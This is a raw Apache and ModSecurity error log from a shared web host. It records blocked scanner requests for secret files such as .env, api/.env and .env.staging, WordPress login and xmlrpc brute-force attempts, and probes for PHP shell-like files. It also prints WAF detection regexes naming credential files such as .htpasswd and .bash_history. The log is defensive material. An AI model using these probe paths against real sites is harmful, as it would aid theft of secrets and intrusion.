[Tue May 26 18:45:08.729941 2026] [security2:error] [pid 1025417:tid 1025660] [client 20.195.199.65:41255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/uwu.php"] [unique_id "ahWc3FHbArxonFeMXvQTwwAAAHE"]
[Tue May 26 18:45:08.821430 2026] [fcgid:warn] [pid 1025417:tid 1025558] (70014)End of file found: [client 199.45.155.74:57210] mod_fcgid: can't get data from http client
[Tue May 26 18:45:09.893010 2026] [security2:error] [pid 1025417:tid 1025452] [remote 46.20.146.46:47160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc3VHbArxonFeMXvQT3QAAWiI"]
[Tue May 26 18:45:09.974305 2026] [security2:error] [pid 1025417:tid 1025591] [client 20.195.199.65:57243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/uwa.php"] [unique_id "ahWc3VHbArxonFeMXvQT6wAAACw"]
[Tue May 26 18:45:09.974408 2026] [security2:error] [pid 1025417:tid 1025591] [client 20.195.199.65:57243] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/uwa.php"] [unique_id "ahWc3VHbArxonFeMXvQT6wAAACw"]
[Tue May 26 18:45:10.217956 2026] [security2:error] [pid 1025417:tid 1025453] [remote 46.20.146.46:47160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc3lHbArxonFeMXvQT7gAAMiM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:45:10.461597 2026] [security2:error] [pid 1025417:tid 1025456] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.save"] [unique_id "ahWc3lHbArxonFeMXvQT-QAAQSY"]
[Tue May 26 18:45:10.761119 2026] [security2:error] [pid 1025417:tid 1025619] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc3lHbArxonFeMXvQT8gAAAEg"]
[Tue May 26 18:45:11.802893 2026] [security2:error] [pid 1025417:tid 1025637] [client 20.195.199.65:65261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/crgio.php"] [unique_id "ahWc31HbArxonFeMXvQUHAAAAFo"]
[Tue May 26 18:45:11.802993 2026] [security2:error] [pid 1025417:tid 1025637] [client 20.195.199.65:65261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/crgio.php"] [unique_id "ahWc31HbArxonFeMXvQUHAAAAFo"]
[Tue May 26 18:45:12.400530 2026] [security2:error] [pid 1025417:tid 1025466] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.staging"] [unique_id "ahWc4FHbArxonFeMXvQUMAAAUDA"]
[Tue May 26 18:45:12.472347 2026] [security2:error] [pid 1025417:tid 1025570] [client 160.25.116.66:60276] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "nicmaperu.com"] [uri "/wp-comments-post.php"] [unique_id "ahWc4FHbArxonFeMXvQUJAAAABc"]
[Tue May 26 18:45:13.167714 2026] [security2:error] [pid 1025417:tid 1025644] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc4FHbArxonFeMXvQUPwAAAGE"]
[Tue May 26 18:45:13.228798 2026] [security2:error] [pid 1025417:tid 1025465] [remote 157.230.213.121:45432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 121.213.230.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc4FHbArxonFeMXvQUQQAAOy8"]
[Tue May 26 18:45:13.395881 2026] [security2:error] [pid 1025417:tid 1025570] [client 160.25.116.66:60276] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "nicmaperu.com"] [uri "/wp-comments-post.php"] [unique_id "ahWc4FHbArxonFeMXvQUJAAAABc"]
[Tue May 26 18:45:13.395920 2026] [security2:error] [pid 1025417:tid 1025570] [client 160.25.116.66:60276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "nicmaperu.com"] [uri "/wp-comments-post.php"] [unique_id "ahWc4FHbArxonFeMXvQUJAAAABc"]
[Tue May 26 18:45:13.442426 2026] [security2:error] [pid 1025417:tid 1025468] [remote 157.230.213.121:45432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 121.213.230.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWc4VHbArxonFeMXvQUWwAAHjI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:45:13.679006 2026] [security2:error] [pid 1025417:tid 1025586] [client 185.191.171.1:48378] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWc4VHbArxonFeMXvQUXwAAACc"]
[Tue May 26 18:45:13.679152 2026] [security2:error] [pid 1025417:tid 1025586] [client 185.191.171.1:48378] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWc4VHbArxonFeMXvQUXwAAACc"]
[Tue May 26 18:45:14.113414 2026] [security2:error] [pid 1025417:tid 1025626] [client 20.195.199.65:63227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/geforce.php"] [unique_id "ahWc4lHbArxonFeMXvQUbAAAAE8"]
[Tue May 26 18:45:14.113503 2026] [security2:error] [pid 1025417:tid 1025626] [client 20.195.199.65:63227] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/geforce.php"] [unique_id "ahWc4lHbArxonFeMXvQUbAAAAE8"]
[Tue May 26 18:45:14.187730 2026] [security2:error] [pid 1025417:tid 1025473] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/api/.env"] [unique_id "ahWc4lHbArxonFeMXvQUcAAAXzc"]
[Tue May 26 18:45:14.336423 2026] [proxy:error] [pid 1025417:tid 1025576] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:14.336470 2026] [proxy_http:error] [pid 1025417:tid 1025576] [client 208.84.100.55:55946] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:14.337057 2026] [proxy:error] [pid 1025417:tid 1025576] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:14.337088 2026] [proxy_http:error] [pid 1025417:tid 1025576] [client 208.84.100.55:55946] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:15.165722 2026] [security2:error] [pid 1025417:tid 1025636] [client 124.43.5.103:40037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWc4lHbArxonFeMXvQUhgAAAFk"]
[Tue May 26 18:45:15.165857 2026] [security2:error] [pid 1025417:tid 1025636] [client 124.43.5.103:40037] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWc4lHbArxonFeMXvQUhgAAAFk"]
[Tue May 26 18:45:15.250507 2026] [security2:error] [pid 1025417:tid 1025474] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc41HbArxonFeMXvQUlAAAKDg"]
[Tue May 26 18:45:15.250691 2026] [security2:error] [pid 1025417:tid 1025587] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWc41HbArxonFeMXvQUlAAAKDg"]
[Tue May 26 18:45:16.054868 2026] [security2:error] [pid 1025417:tid 1025640] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWc41HbArxonFeMXvQUogAAAF0"]
[Tue May 26 18:45:16.071864 2026] [security2:error] [pid 1025417:tid 1025475] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/apps/.env"] [unique_id "ahWc5FHbArxonFeMXvQUrAAARDk"]
[Tue May 26 18:45:17.550247 2026] [proxy:error] [pid 1025417:tid 1025569] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.550325 2026] [proxy_http:error] [pid 1025417:tid 1025569] [client 208.84.100.55:56172] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.550423 2026] [proxy:error] [pid 1025417:tid 1025560] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.550467 2026] [proxy_http:error] [pid 1025417:tid 1025560] [client 208.84.100.55:56218] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.550946 2026] [proxy:error] [pid 1025417:tid 1025569] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.551000 2026] [proxy_http:error] [pid 1025417:tid 1025569] [client 208.84.100.55:56172] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.551078 2026] [proxy:error] [pid 1025417:tid 1025560] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.551114 2026] [proxy_http:error] [pid 1025417:tid 1025560] [client 208.84.100.55:56218] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.552411 2026] [proxy:error] [pid 1025417:tid 1025618] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.552492 2026] [proxy_http:error] [pid 1025417:tid 1025618] [client 208.84.100.55:56070] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.552665 2026] [proxy:error] [pid 1025417:tid 1025647] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.552741 2026] [proxy_http:error] [pid 1025417:tid 1025647] [client 208.84.100.55:56184] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.553187 2026] [proxy:error] [pid 1025417:tid 1025618] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.553225 2026] [proxy_http:error] [pid 1025417:tid 1025618] [client 208.84.100.55:56070] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.553315 2026] [proxy:error] [pid 1025417:tid 1025647] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.553350 2026] [proxy_http:error] [pid 1025417:tid 1025647] [client 208.84.100.55:56184] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.631222 2026] [proxy:error] [pid 1025417:tid 1025617] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.631286 2026] [proxy_http:error] [pid 1025417:tid 1025617] [client 208.84.100.55:56148] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.631887 2026] [proxy:error] [pid 1025417:tid 1025617] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.631931 2026] [proxy_http:error] [pid 1025417:tid 1025617] [client 208.84.100.55:56148] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.834920 2026] [proxy:error] [pid 1025417:tid 1025601] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.834990 2026] [proxy_http:error] [pid 1025417:tid 1025601] [client 208.84.100.55:56198] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.835356 2026] [proxy:error] [pid 1025417:tid 1025653] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.835410 2026] [proxy_http:error] [pid 1025417:tid 1025653] [client 208.84.100.55:56132] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.835845 2026] [proxy:error] [pid 1025417:tid 1025601] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.835892 2026] [proxy_http:error] [pid 1025417:tid 1025601] [client 208.84.100.55:56198] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.836288 2026] [proxy:error] [pid 1025417:tid 1025653] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.836339 2026] [proxy_http:error] [pid 1025417:tid 1025653] [client 208.84.100.55:56132] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.836509 2026] [security2:error] [pid 1025417:tid 1025555] [client 208.84.100.55:56010] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/api/.env"] [unique_id "ahWc5VHbArxonFeMXvQU6AAAAAg"]
[Tue May 26 18:45:17.836718 2026] [proxy:error] [pid 1025417:tid 1025626] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.836781 2026] [security2:error] [pid 1025417:tid 1025668] [client 208.84.100.55:56002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/app/.env"] [unique_id "ahWc5VHbArxonFeMXvQU6QAAAHk"]
[Tue May 26 18:45:17.836794 2026] [proxy_http:error] [pid 1025417:tid 1025626] [client 208.84.100.55:56158] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.837299 2026] [proxy:error] [pid 1025417:tid 1025570] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.837367 2026] [proxy_http:error] [pid 1025417:tid 1025570] [client 208.84.100.55:56064] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.837460 2026] [proxy:error] [pid 1025417:tid 1025626] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.837497 2026] [proxy_http:error] [pid 1025417:tid 1025626] [client 208.84.100.55:56158] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.837593 2026] [proxy:error] [pid 1025417:tid 1025669] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.837660 2026] [proxy_http:error] [pid 1025417:tid 1025669] [client 208.84.100.55:56086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.837870 2026] [proxy:error] [pid 1025417:tid 1025659] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.837929 2026] [proxy_http:error] [pid 1025417:tid 1025659] [client 208.84.100.55:56026] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.838011 2026] [proxy:error] [pid 1025417:tid 1025570] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.838050 2026] [proxy_http:error] [pid 1025417:tid 1025570] [client 208.84.100.55:56064] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.838220 2026] [proxy:error] [pid 1025417:tid 1025642] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.838290 2026] [proxy_http:error] [pid 1025417:tid 1025642] [client 208.84.100.55:56038] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.838363 2026] [security2:error] [pid 1025417:tid 1025609] [client 208.84.100.55:56014] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/backend/.env"] [unique_id "ahWc5VHbArxonFeMXvQU8AAAAD4"]
[Tue May 26 18:45:17.838380 2026] [proxy:error] [pid 1025417:tid 1025669] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.838421 2026] [proxy_http:error] [pid 1025417:tid 1025669] [client 208.84.100.55:56086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.838506 2026] [proxy:error] [pid 1025417:tid 1025557] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.838549 2026] [proxy_http:error] [pid 1025417:tid 1025557] [client 208.84.100.55:56216] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.838666 2026] [proxy:error] [pid 1025417:tid 1025637] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.838709 2026] [proxy_http:error] [pid 1025417:tid 1025637] [client 208.84.100.55:56180] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.838815 2026] [proxy:error] [pid 1025417:tid 1025596] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.838867 2026] [proxy_http:error] [pid 1025417:tid 1025596] [client 208.84.100.55:56168] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.839111 2026] [proxy:error] [pid 1025417:tid 1025659] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.839152 2026] [proxy_http:error] [pid 1025417:tid 1025659] [client 208.84.100.55:56026] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.839235 2026] [proxy:error] [pid 1025417:tid 1025557] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.839274 2026] [proxy_http:error] [pid 1025417:tid 1025557] [client 208.84.100.55:56216] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.839387 2026] [security2:error] [pid 1025417:tid 1025558] [client 208.84.100.55:55964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.veganfoodindia.com"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahWc5VHbArxonFeMXvQU8wAAAAs"]
[Tue May 26 18:45:17.839394 2026] [proxy:error] [pid 1025417:tid 1025561] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.839453 2026] [proxy_http:error] [pid 1025417:tid 1025561] [client 208.84.100.55:56020] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.839545 2026] [proxy:error] [pid 1025417:tid 1025637] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.839582 2026] [proxy_http:error] [pid 1025417:tid 1025637] [client 208.84.100.55:56180] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.839727 2026] [proxy:error] [pid 1025417:tid 1025596] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.839771 2026] [proxy_http:error] [pid 1025417:tid 1025596] [client 208.84.100.55:56168] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.839921 2026] [proxy:error] [pid 1025417:tid 1025642] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.839962 2026] [proxy_http:error] [pid 1025417:tid 1025642] [client 208.84.100.55:56038] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.840327 2026] [proxy:error] [pid 1025417:tid 1025611] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.840396 2026] [proxy_http:error] [pid 1025417:tid 1025611] [client 208.84.100.55:56052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.840490 2026] [proxy:error] [pid 1025417:tid 1025619] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.840525 2026] [proxy_http:error] [pid 1025417:tid 1025619] [client 208.84.100.55:55986] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.841108 2026] [proxy:error] [pid 1025417:tid 1025619] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.841140 2026] [proxy_http:error] [pid 1025417:tid 1025619] [client 208.84.100.55:55986] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.841531 2026] [proxy:error] [pid 1025417:tid 1025577] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.841589 2026] [proxy_http:error] [pid 1025417:tid 1025577] [client 208.84.100.55:56196] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:45:17.841694 2026] [proxy:error] [pid 1025417:tid 1025578] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:45:17.841734 2026] [proxy_http:error] [pid 1025417:tid 1025578] [client 208.84.100.55:56098] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
